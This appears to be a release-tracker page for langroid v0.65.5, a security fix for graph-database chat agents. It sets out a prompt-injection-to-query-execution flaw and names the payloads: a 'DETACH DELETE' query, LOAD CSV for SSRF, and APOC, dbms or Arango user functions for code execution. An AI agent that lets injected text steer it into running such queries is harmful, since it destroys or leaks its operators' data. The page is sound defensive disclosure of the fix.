langroid

v0.65.5 Security

This release includes 2 security fixes for security teams reviewing exposed deployments.

Published 4d AI Agents & Assistants

View tool

✓ No known CVEs patched

Read the diff → Tool health → What is this tool? →

This release patches 2 known CVEs

Topics

agents ai chatgpt function-calling llm gpt-4

+10 more

gpt4 information-retrieval language-model llama llm-agent llm-framework local-llm multi-agent-systems openai-api retrieval-augmented-generation

Affected surfaces

rce_ssrf

ReleasePort's take

Moderate signal

editorial:auto 4d

Version 0.65.5 blocks prompt‑injection to query execution in Neo4jChatAgent and ArangoChatAgent by default.

Why it matters: The release prevents prompt‑injection attacks that could execute arbitrary Cypher or AQL queries; all deployments should upgrade immediately because the mitigation is enabled out‑of‑the‑box.

Summary

AI summary

Security fix closes prompt‑injection to query execution in Neo4jChatAgent (Cypher) and ArangoChatAgent (AQL).

Changes in this release

Type	Severity	Summary	CVE
Security	Critical	Blocks prompt‑injection to query execution in Neo4jChatAgent and ArangoChatAgent by default. Blocks prompt‑injection to query execution in Neo4jChatAgent and ArangoChatAgent by default. Source: llm_adapter@2026-06-15 Confidence: high	—
Breaking	High	Restricts retrieval tools to read‑only queries; write or admin clauses are rejected by default. Restricts retrieval tools to read‑only queries; write or admin clauses are rejected by default. Source: llm_adapter@2026-06-15 Confidence: high	—
Breaking	High	Blocks code‑execution, file, and network primitives in creation tools by default. Blocks code‑execution, file, and network primitives in creation tools by default. Source: llm_adapter@2026-06-15 Confidence: high	—
Feature	Medium	Adds `allow_dangerous_operations` config flag (default False) to toggle unrestricted query execution. Adds `allow_dangerous_operations` config flag (default False) to toggle unrestricted query execution. Source: llm_adapter@2026-06-15 Confidence: high	—

Full changelog

0.65.5 — Security release

A security patch closing a prompt-injection-to-query-execution flaw in the
graph-database chat agents, Neo4jChatAgent (Cypher) and ArangoChatAgent
(AQL). Upgrading is strongly recommended for anyone exposing either agent to
untrusted input — directly, or indirectly via content the agent reads back
through RAG.

pip install -U langroid

Security fix

Neo4jChatAgent / ArangoChatAgent executed LLM-generated queries without validation

Advisory:
GHSA-2pq5-3q89-j7cc
— High

Neo4jChatAgent passed LLM-generated Cypher, and ArangoChatAgent passed
LLM-generated AQL, straight to the database driver with no validation and no
opt-out gate. Because the query text is influenceable by prompt injection, an
attacker who could steer the prompt could:

read or destroy all graph data (e.g. Cypher MATCH (n) DETACH DELETE n) and
use the LOAD CSV remote-fetch (SSRF) primitive — present regardless of
server configuration; and
escalate toward OS-command / filesystem access (config-conditional RCE) where
APOC or dbms.security procedures (Neo4j), or user-defined functions / Foxx
(Arango), are enabled on the database role.

This is the same defect class as the SQLChatAgent prompt-to-SQL-to-RCE issue
fixed in 0.63.0 (CVE-2026-25879); that fix did not extend to the graph-DB
agents.

Fix: both agents now mirror the SQLChatAgent controls. A new
allow_dangerous_operations config flag (default False) gates execution:

the retrieval tool is restricted to read-only queries (write/admin clauses
are rejected);
the creation tool allows ordinary writes;
both tools reject code-execution / file / network primitives (LOAD CSV,
apoc.*, dbms.*, CALL db.* for Cypher; user-defined namespace::func
calls for AQL).

Validation runs at the tool handlers, so internal schema-introspection and
maintenance calls are unaffected. Reported by
@matte1782.

Behavior change

By default (allow_dangerous_operations=False), LLM-generated graph queries are
now restricted:

cypher_retrieval_tool / aql_retrieval_tool execute read-only queries; a
write or admin clause is rejected and the reason is returned to the LLM.
cypher_creation_tool / aql_creation_tool still perform writes, but
code-execution / file / network primitives are blocked.
To restore the previous unrestricted behavior (only safe with a
least-privilege DB role and trusted prompts), set
allow_dangerous_operations=True on Neo4jChatAgentConfig /
ArangoChatAgentConfig.

Upgrade

pip install -U langroid

Full changelog:
0.65.4...0.65.5

Security Fixes

GHSA-2pq5-3q89-j7cc — High: Neo4jChatAgent and ArangoChatAgent executed LLM‑generated Cypher/AQL queries without validation, enabling data read/write or remote code execution; fixed by adding `allow_dangerous_operations` flag (default False) that restricts retrieval to read‑only and blocks code‑execution primitives.
CVE-2026-25879

View diff on GitHub

Weekly OSS security release digest.

The CVE patches and breaking changes that affected production tools this week. One email, every Sunday.

No spam, unsubscribe anytime.

Share this release

Share on X Share on Bluesky

Track langroid

Get notified when new releases ship.

About langroid

Harness LLMs with Multi-Agent Programming

All releases →

Related context

Related tools

Earlier breaking changes

v0.65.3 Raw user messages containing tools registered with `enable_message(..., use=False, handle=True)` are now dropped instead of executed.
v0.65.2 Restricts eval'd expression builtins to a curated safe set, breaking code that relied on full Python builtins (e.g., __import__, open).
v0.65.1 Rejects additional PostgreSQL-specific obfuscations of dangerous functions like `pg_read_file` in `SQLChatAgent`.
v0.65.0 Default PDF parser switched from pymupdf4llm to pypdfium2; AGPL dependency removed.
v0.64.0 Rejects PostgreSQL/SQLite/MSSQL primitives that enable arbitrary file reads.